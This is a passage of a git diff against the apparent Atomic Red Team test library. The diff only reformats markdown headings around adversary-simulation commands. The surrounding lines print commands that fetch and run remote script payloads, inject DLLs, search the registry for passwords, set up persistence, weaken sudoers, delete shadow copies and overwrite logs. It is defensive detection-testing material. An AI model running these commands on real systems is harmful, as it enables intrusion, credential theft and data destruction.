-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo cp "#{plist}" /etc/emond.d/rules/T1165_emond.plist
sudo touch /private/var/db/emondClients/T1165
#Clean up
diff --git a/atomics/T1166/T1166.md b/atomics/T1166/T1166.md
index 6048cc50..2837d6fe 100644
--- a/atomics/T1166/T1166.md
+++ b/atomics/T1166/T1166.md
@@ -26,8 +26,7 @@ Setuid and Setgid
|------|-------------|------|---------------|
| payload | hello.c payload | path | hello.c|
-#### Run it with these steps!
-1. make hello
+#### Run it with these steps! 1. make hello
2. sudo chown root hello
@@ -50,8 +49,7 @@ This test sets the SetUID flag on a file in Linux and macOS.
|------|-------------|------|---------------|
| file_to_setuid | Path of file to set SetUID flag | path | /tmp/evilBinary|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo chown root #{file_to_setuid}
sudo chmod u+s #{file_to_setuid}
```
@@ -69,8 +67,7 @@ This test sets the SetGID flag on a file in Linux and macOS.
|------|-------------|------|---------------|
| file_to_setuid | Path of file to set SetGID flag | path | /tmp/evilBinary|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo chown root #{file_to_setuid}
sudo chmod g+s #{file_to_setuid}
```
diff --git a/atomics/T1168/T1168.md b/atomics/T1168/T1168.md
index 0010420e..8ce66670 100644
--- a/atomics/T1168/T1168.md
+++ b/atomics/T1168/T1168.md
@@ -39,8 +39,7 @@ This test replaces the current user's crontab file with the contents of the refe
| command | Command to execute | string | /tmp/evil.sh|
| tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
```
@@ -58,8 +57,7 @@ This test adds a script to a cron folder configured to execute on a schedule. Th
| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
| cron_script_name | Name of file to store in cron folder | string | persistevil|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
```
@@ -71,8 +69,7 @@ This test adds persistence via a plist to execute via the macOS Event Monitor Da
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with these steps!
-1. Place this file in /etc/emond.d/rules/atomicredteam.plist
+#### Run it with these steps! 1. Place this file in /etc/emond.d/rules/atomicredteam.plist
diff --git a/atomics/T1169/T1169.md b/atomics/T1169/T1169.md
index 7cd300a2..4cada5f5 100644
--- a/atomics/T1169/T1169.md
+++ b/atomics/T1169/T1169.md
@@ -17,8 +17,7 @@ Common Sudo enumeration methods.
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo -l
sudo su
cat /etc/sudoers
diff --git a/atomics/T1170/T1170.md b/atomics/T1170/T1170.md
index c5a7cedf..be3c4d5a 100644
--- a/atomics/T1170/T1170.md
+++ b/atomics/T1170/T1170.md
@@ -28,8 +28,7 @@ Test execution of a remote script using mshta.exe
|------|-------------|------|---------------|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
```
diff --git a/atomics/T1173/T1173.md b/atomics/T1173/T1173.md
index f5d4a7f9..3b19fafd 100644
--- a/atomics/T1173/T1173.md
+++ b/atomics/T1173/T1173.md
@@ -19,8 +19,7 @@ Executes commands via DDE using Microsfot Word
**Supported Platforms:** Windows
-#### Run it with these steps!
-Open Microsoft Word
+#### Run it with these steps! Open Microsoft Word
Insert tab -> Quick Parts -> Field
diff --git a/atomics/T1174/T1174.md b/atomics/T1174/T1174.md
index 5f8be027..496da46b 100644
--- a/atomics/T1174/T1174.md
+++ b/atomics/T1174/T1174.md
@@ -24,8 +24,7 @@ Uses PowerShell to install and register a password filter DLL. Requires a reboot
|------|-------------|------|---------------|
| input_dll | Path to DLL to be installed and registered | Path | C:\AtomicRedTeam\atomics\T1174\src\AtomicPasswordFilter.dll|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md
index 5ee85808..23df705a 100644
--- a/atomics/T1176/T1176.md
+++ b/atomics/T1176/T1176.md
@@ -21,8 +21,7 @@ xxx
**Supported Platforms:** Linux, Windows, macOS
-#### Run it with these steps!
-1. Navigate to [chrome://extensions](chrome://extensions) and
+#### Run it with these steps! 1. Navigate to [chrome://extensions](chrome://extensions) and
tick 'Developer Mode'.
2. Click 'Load unpacked extension...' and navigate to
@@ -40,8 +39,7 @@ xxx
**Supported Platforms:** Linux, Windows, macOS
-#### Run it with these steps!
-1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
+#### Run it with these steps! 1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
@@ -56,8 +54,7 @@ Create a file called test.wma, with the duration of 30 seconds
**Supported Platforms:** Linux, Windows, macOS
-#### Run it with these steps!
-1. Navigate to [about:debugging](about:debugging) and
+#### Run it with these steps! 1. Navigate to [about:debugging](about:debugging) and
click "Load Temporary Add-on"
2. Navigate to [manifest.json](./manifest.json)
diff --git a/atomics/T1179/T1179.md b/atomics/T1179/T1179.md
index 58c442f1..9af31381 100644
--- a/atomics/T1179/T1179.md
+++ b/atomics/T1179/T1179.md
@@ -33,8 +33,7 @@ Hooks functions in PowerShell to read TLS Communications
| file_name | Dll To Inject | Path | C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll|
| server_name | TLS Server To Test Get Request | Url | https://www.example.com|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
mavinject $pid /INJECTRUNNING #{file_name}
curl #{server_name}
```
diff --git a/atomics/T1180/T1180.md b/atomics/T1180/T1180.md
index 97eafb50..62ac20dc 100644
--- a/atomics/T1180/T1180.md
+++ b/atomics/T1180/T1180.md
@@ -29,8 +29,7 @@ This test copies a binary into the Windows System32 folder and sets it as the sc
|------|-------------|------|---------------|
| input_binary | Executable binary to use in place of screensaver for persistence | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverTimeout /t REG_SZ /d 60 /f
diff --git a/atomics/T1183/T1183.md b/atomics/T1183/T1183.md
index 145d6399..f600b8ac 100644
--- a/atomics/T1183/T1183.md
+++ b/atomics/T1183/T1183.md
@@ -37,8 +37,7 @@ Leverage Global Flags Settings
| target_binary | Binary To Attach To | Path | winword.exe|
| payload_binary | Binary To Execute | Path | cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
```
@@ -56,8 +55,7 @@ Leverage Global Flags Settings
| target_binary | Binary To Attach To | Path | notepad.exe|
| payload_binary | Binary To Execute | Path | cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
```
diff --git a/atomics/T1191/T1191.md b/atomics/T1191/T1191.md
index fa2ee84e..cd9fe067 100644
--- a/atomics/T1191/T1191.md
+++ b/atomics/T1191/T1191.md
@@ -26,8 +26,7 @@ Adversaries may supply CMSTP.exe with INF files infected with malicious commands
|------|-------------|------|---------------|
| inf_file_path | Path to the INF file | path | T1191.inf|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmstp.exe /s #{inf_file_path}
```
@@ -44,8 +43,7 @@ Adversaries may invoke cmd.exe (or other malicious commands) by embedding them i
|------|-------------|------|---------------|
| inf_file_uac | Path to the INF file | path | T1191_uacbypass.inf|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmstp.exe /s #{inf_file_uac} /au
```
diff --git a/atomics/T1193/T1193.md b/atomics/T1193/T1193.md
index bd02af64..18e416ac 100644
--- a/atomics/T1193/T1193.md
+++ b/atomics/T1193/T1193.md
@@ -18,8 +18,7 @@ The below will successfully download the macro-enabled Excel file to the current
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){
return 'Please install Microsoft Excel before running this test.'
}
diff --git a/atomics/T1196/T1196.md b/atomics/T1196/T1196.md
index c458b43c..667d9690 100644
--- a/atomics/T1196/T1196.md
+++ b/atomics/T1196/T1196.md
@@ -24,8 +24,7 @@ This test simulates an adversary leveraging control.exe to execute a payload and
|------|-------------|------|---------------|
| cpl_file_path | path to cpl file | path | calc.cpl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
control.exe #{cpl_file_path}
```
diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md
index a5281693..18d29e36 100644
--- a/atomics/T1197/T1197.md
+++ b/atomics/T1197/T1197.md
@@ -32,8 +32,7 @@ and execute a payload
| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| local_file | Local file path to save downloaded file | path | C:\Windows\Temp\bitsadmin_flag.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
```
@@ -52,8 +51,7 @@ and execute a payload leveraging PowerShell
| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| local_file | Local file path to save downloaded file | path | C:\Windows\Temp\bitsadmin_flag.ps1|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
```
@@ -75,8 +73,7 @@ and execute a payload in multiple steps. This job will remain in the BITS queue
| command_path | Path of command to execute | path | C:\Windows\system32\notepad.exe|
| command_line | Command line to execute | string | C:\Windows\Temp\bitsadmin_flag.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md
index 1191b36d..43bddab0 100644
--- a/atomics/T1201/T1201.md
+++ b/atomics/T1201/T1201.md
@@ -40,8 +40,7 @@ Lists the password complexity policy to console on Ubuntu Linux.
**Supported Platforms:** Ubuntu
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
cat /etc/pam.d/common-password
```
@@ -53,8 +52,7 @@ Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
**Supported Platforms:** CentOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
cat /etc/security/pwquality.conf
```
@@ -66,8 +64,7 @@ Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
**Supported Platforms:** CentOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
cat /etc/pam.d/system-auth
cat /etc/security/pwquality.conf
@@ -81,8 +78,7 @@ Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
**Supported Platforms:** Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
cat /etc/login.defs
```
@@ -94,8 +90,7 @@ Lists the local password policy to console on Windows.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net accounts
```
@@ -107,8 +102,7 @@ Lists the domain password policy to console on Windows.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net accounts /domain
```
@@ -120,8 +114,7 @@ Lists the password policy to console on Windows.
**Supported Platforms:** macOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
pwpolicy getaccountpolicies
```
diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md
index 1085d8e6..c4d2b7a8 100644
--- a/atomics/T1202/T1202.md
+++ b/atomics/T1202/T1202.md
@@ -28,8 +28,7 @@ The Program Compatibility Assistant (pcalua.exe) may invoke the execution of pro
| payload_path | Path to payload | path | c:\temp\payload.dll|
| payload_cpl_path | Path to payload | path | C:\Windows\system32\javacpl.cpl -c Java|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
pcalua.exe -a #{process}
pcalua.exe -a #{payload_path}
pcalua.exe -a #{payload_cpl_path}
@@ -52,8 +51,7 @@ forfiles.exe may invoke the execution of programs and commands from a Command-Li
|------|-------------|------|---------------|
| process | Process to execute | string | calc.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
```
diff --git a/atomics/T1206/T1206.md b/atomics/T1206/T1206.md
index 7f78c607..c5958ccc 100644
--- a/atomics/T1206/T1206.md
+++ b/atomics/T1206/T1206.md
@@ -21,8 +21,7 @@ Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
```
@@ -35,8 +34,7 @@ Sets sudo caching tty_tickets value to disabled. This is dangerous to modify wit
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
```
diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md
index 574248f2..ceb41dd0 100644
--- a/atomics/T1207/T1207.md
+++ b/atomics/T1207/T1207.md
@@ -22,8 +22,7 @@ Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
**Supported Platforms:** Windows
-#### Run it with these steps!
-1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
+#### Run it with these steps! 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
4. lsadump::dcshadow /push
diff --git a/atomics/T1214/T1214.md b/atomics/T1214/T1214.md
index 5079e632..8d7b7be2 100644
--- a/atomics/T1214/T1214.md
+++ b/atomics/T1214/T1214.md
@@ -20,8 +20,7 @@ Queries to enumerate for credentials in the Registry.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```
diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
index 77f15e5d..ac85be65 100644
--- a/atomics/T1216/T1216.md
+++ b/atomics/T1216/T1216.md
@@ -24,8 +24,7 @@ Executes the signed PubPrn.vbs script with options to download and execute an ar
|------|-------------|------|---------------|
| remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
```
diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md
index 32c8e9aa..afe25fa0 100644
--- a/atomics/T1217/T1217.md
+++ b/atomics/T1217/T1217.md
@@ -21,8 +21,7 @@ Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
```
@@ -34,8 +33,7 @@ Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookm
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
```
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 8b146ee9..4a0369df 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -48,8 +48,7 @@ Injects arbitrary DLL into running process specified by process ID. Requires Win
| dll_payload | DLL to inject | Path | C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll|
| process_id | PID of process receiving injection | string | 1000|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
```
@@ -66,8 +65,7 @@ Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires
|------|-------------|------|---------------|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
SyncAppvPublishingServer.exe "n; #{powershell_code}"
```
@@ -84,8 +82,7 @@ Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
```
diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md
index dcc29282..49f7e327 100644
--- a/atomics/T1220/T1220.md
+++ b/atomics/T1220/T1220.md
@@ -40,8 +40,7 @@ Executes the code specified within a XSL script tag during XSL transformation us
| xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml|
| xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
```
@@ -59,8 +58,7 @@ Executes the code specified within a XSL script tag during XSL transformation us
| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml|
| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
```
@@ -78,8 +76,7 @@ Executes the code specified within a XSL script using a local payload.
| wmic_command | WMI command to execute using wmic.exe | string | process list|
| local_xsl_file | Location of the test XSL script file on the local filesystem. | path | C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
```
@@ -97,8 +94,7 @@ Executes the code specified within a XSL script using a remote payload.
| wmic_command | WMI command to execute using wmic.exe | string | process list|
| remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
```
diff --git a/atomics/T1222/T1222.md b/atomics/T1222/T1222.md
index 6f3882ac..168626f9 100644
--- a/atomics/T1222/T1222.md
+++ b/atomics/T1222/T1222.md
@@ -52,8 +52,7 @@ Modifies the filesystem permissions of the specified file or folder to take owne
|------|-------------|------|---------------|
| file_folder_to_own | Path of the file or folder for takeown to take ownership. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
takeown.exe /f #{file_folder_to_own}
```
@@ -70,8 +69,7 @@ Modifies the filesystem permissions of the specified folder to take ownership of
|------|-------------|------|---------------|
| folder_to_own | Path of the folder for takeown to take ownership. | path | C:\AtomicRedTeam\atomics\T1222|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
takeown.exe /f #{folder_to_own} /r
```
@@ -89,8 +87,7 @@ Modifies the filesystem permissions of the specified file or folder to allow the
| file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml|
| user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cacls.exe #{file_or_folder} /grant #{user_or_group}:F
```
@@ -108,8 +105,7 @@ Modifies the filesystem permissions of the specified folder and contents to allo
| file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222|
| user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
```
@@ -127,8 +123,7 @@ Modifies the filesystem permissions of the specified file or folder to allow the
| file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml|
| user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
icacls.exe #{file_or_folder} /grant #{user_or_group}:F
```
@@ -146,8 +141,7 @@ Modifies the filesystem permissions of the specified folder and contents to allo
| file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222|
| user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
icacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
```
@@ -164,8 +158,7 @@ Removes the read-only attribute from a file or folder using the attrib.exe comma
|------|-------------|------|---------------|
| file_or_folder | Path of the file or folder remove attribute. | path | C:\AtomicRedTeam\atomics\T1222|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
attrib.exe -r #{file_or_folder}
```
@@ -183,8 +176,7 @@ Changes a file or folder's permissions using chmod and a specified numeric mode.
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
| numeric_mode | Specified numeric mode value | string | 755|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chmod #{numeric_mode} #{file_or_folder}
```
@@ -202,8 +194,7 @@ Changes a file or folder's permissions using chmod and a specified symbolic mode
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
| symbolic_mode | Specified symbolic mode value | string | a+w|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chmod #{symbolic_mode} #{file_or_folder}
```
@@ -221,8 +212,7 @@ Changes a file or folder's permissions recursively using chmod and a specified n
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
| numeric_mode | Specified numeric mode value | string | 755|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chmod #{numeric_mode} #{file_or_folder} -R
```
@@ -240,8 +230,7 @@ Changes a file or folder's permissions recursively using chmod and a specified s
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
| symbolic_mode | Specified symbolic mode value | string | a+w|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chmod #{symbolic_mode} #{file_or_folder} -R
```
@@ -260,8 +249,7 @@ Changes a file or folder's ownership and group information using chown.
| owner | Username of desired owner | string | root|
| group | Group name of desired group | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chown #{owner}:#{group} #{file_or_folder}
```
@@ -280,8 +268,7 @@ Changes a file or folder's ownership and group information recursively using cho
| owner | Username of desired owner | string | root|
| group | Group name of desired group | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chown #{owner}:#{group} #{file_or_folder} -R
```
@@ -299,8 +286,7 @@ Changes a file or folder's ownership only using chown.
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222/T1222.yaml|
| owner | Username of desired owner | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chown #{owner} #{file_or_folder}
```
@@ -318,8 +304,7 @@ Changes a file or folder's ownership only recursively using chown.
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
| owner | Username of desired owner | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chown #{owner} #{file_or_folder} -R
```
@@ -337,8 +322,7 @@ This technique was used by the threat actor Rocke during the compromise of Linux
|------|-------------|------|---------------|
| file_to_modify | Path of the file | path | /var/spool/cron/root|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
chattr -i #{file_to_modify}
```
diff --git a/atomics/T1223/T1223.md b/atomics/T1223/T1223.md
index f1a6d3db..b3158791 100644
--- a/atomics/T1223/T1223.md
+++ b/atomics/T1223/T1223.md
@@ -24,8 +24,7 @@ Uses hh.exe to execute a local compiled HTML Help payload.
|------|-------------|------|---------------|
| local_chm_file | Local .chm payload | path | C:\atomic-red-team\atomics\T1223\src\T1223.chm|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
hh.exe #{local_chm_file}
```
@@ -42,8 +41,7 @@ Uses hh.exe to execute a remote compiled HTML Help payload.
|------|-------------|------|---------------|
| remote_chm_file | Remote .chm payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1223/src/T1223.chm|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
hh.exe #{remote_chm_file}
```
diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md
index 170c7bc3..1728911a 100644
--- a/atomics/T1482/T1482.md
+++ b/atomics/T1482/T1482.md
@@ -18,8 +18,7 @@ Requires the installation of dsquery via Windows RSAT or the Windows Server AD D
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
dsquery * -filter "(objectClass=trustedDomain)" -attr *
```
@@ -33,8 +32,7 @@ This technique has been used by the Trickbot malware family.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
nltest /domain_trusts
```
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index b58bf90b..1ad587e8 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -27,8 +27,7 @@ Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomw
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
vssadmin.exe delete shadows /all /quiet
```
@@ -40,8 +39,7 @@ Deletes Windows Backup Catalog. This technique is used by numerous ransomware fa
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wbadmin.exe delete catalog -quiet
```
@@ -54,8 +52,7 @@ This technique is used by numerous ransomware families and APT malware such as O
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
@@ -74,8 +71,7 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
|------|-------------|------|---------------|
| file_to_overwrite | Path of file to overwrite and remove | Path | C:\some\file.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sdelete.exe #{file_to_overwrite}
```
@@ -95,8 +91,7 @@ To stop the test, break the command with CTRL/CMD+C.
| overwrite_source | Path of data source to overwrite with | Path | /dev/zero|
| file_to_overwrite | Path of file to overwrite and remove | Path | /var/log/syslog|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
dd of=#{file_to_overwrite} if=#{overwrite_source}
```
diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md
index 3238fd91..6588ced5 100644
--- a/atomics/T1489/T1489.md
+++ b/atomics/T1489/T1489.md
@@ -26,8 +26,7 @@ Stops a specified service using the sc.exe command.
|------|-------------|------|---------------|
| service_name | Name of a service to stop | String | spooler|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sc.exe stop #{service_name}
```
@@ -44,8 +43,7 @@ Stops a specified service using the net.exe command.
|------|-------------|------|---------------|
| service_name | Name of a service to stop | String | spooler|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net.exe stop #{service_name}
```
@@ -63,8 +61,7 @@ This technique was used by WannaCry.
|------|-------------|------|---------------|
| process_name | Name of a process to kill | String | sqlwriter.exe|
